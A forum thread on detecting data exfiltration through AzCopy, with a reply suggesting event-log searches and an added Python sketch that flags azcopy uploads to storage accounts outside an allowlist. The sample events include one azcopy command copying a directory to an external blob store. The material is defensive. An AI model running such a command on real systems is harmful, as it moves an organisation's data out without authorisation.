Dean_Gross (Silver Contributor), Jun 19, 2021

Methods for Detecting Exfiltration using AZcopy
What are the best ways to monitor for this type of event: "Exfiltrating data by transferring it to the cloud with Azcopy" – Microsoft 365 Security (m365internals.com)?
GaryBushey (Bronze Contributor):
Dean_Gross I haven't actually tried this, but I would think you could search the Event and SecurityEvent tables for the azcopy command and then filter based on the file you are looking for. Of course, a smart person would rename the file before trying to upload it, so you may want to see if the URL it is sending the data to is external to your company.
Take a look at this blog post to give you an idea on how to do this: Monitor and Hunting P0w3rSh3LL with Azure Sentinel (eshlomo.us)
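Added example, not from the thread or either blog post: a Python sketch of the check Gary describes, run over constructed process-creation rows (computer, account, command line) of the kind a SecurityEvent 4688 record exposes. The sample rows, the `ALLOWED_ACCOUNTS` allowlist and the Azure Storage endpoint pattern are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (not real telemetry):
# (Computer, Account, CommandLine), roughly as a SecurityEvent 4688 row exposes them.
SAMPLE_EVENTS = [
    ("WS01", "CONTOSO\\alice", r'"C:\Tools\azcopy.exe" copy "C:\Finance\q2.xlsx" "https://contosocorp.blob.core.windows.net/backup/q2.xlsx"'),
    ("WS02", "CONTOSO\\bob", r'azcopy.exe copy "D:\export\*" "https://randomstore123.blob.core.windows.net/x?sv=2020-08-04&sig=REDACTED" --recursive'),
    ("WS03", "CONTOSO\\carol", r'"C:\Program Files\7-Zip\7z.exe" a archive.7z notes.txt'),
    ("WS04", "CONTOSO\\dave", r'azcopy sync "C:\Users\dave\Documents" "https://contosocorp.file.core.windows.net/share/docs"'),
]

# Storage accounts the organisation owns (assumed allowlist); any other account is external.
ALLOWED_ACCOUNTS = {"contosocorp"}

# Matches azcopy / azcopy.exe as the executable token in a command line.
AZCOPY_RE = re.compile(r'(?:^|[\\/"\s])azcopy(?:\.exe)?["\s]', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"]+', re.IGNORECASE)


def storage_account(url: str):
    """Return the storage account name for an Azure Storage endpoint URL, else None."""
    host = (urlparse(url).hostname or "").lower()
    m = re.match(r'([a-z0-9]+)\.(?:blob|file|dfs|queue|table)\.core\.windows\.net$', host)
    return m.group(1) if m else None


def find_external_azcopy(events, allowed=ALLOWED_ACCOUNTS):
    """Return (computer, account, storage_account, url) for each azcopy invocation
    whose destination is a storage account outside the allowlist."""
    hits = []
    for computer, account, cmdline in events:
        if not AZCOPY_RE.search(cmdline):
            continue
        for url in URL_RE.findall(cmdline):
            acct = storage_account(url)
            if acct is None or acct in allowed:
                continue
            # Drop the query string so a SAS token never ends up in the alert record.
            clean = url.split("?", 1)[0]
            hits.append((computer, account, acct, clean))
    return hits


if __name__ == "__main__":
    for hit in find_external_azcopy(SAMPLE_EVENTS):
        print("external azcopy destination:", hit)
```

Because it keys on the executable name in the command line, a renamed binary slips past it, which is the gap Gary points at; correlating destination hosts from proxy or DNS logs against the same allowlist covers part of that.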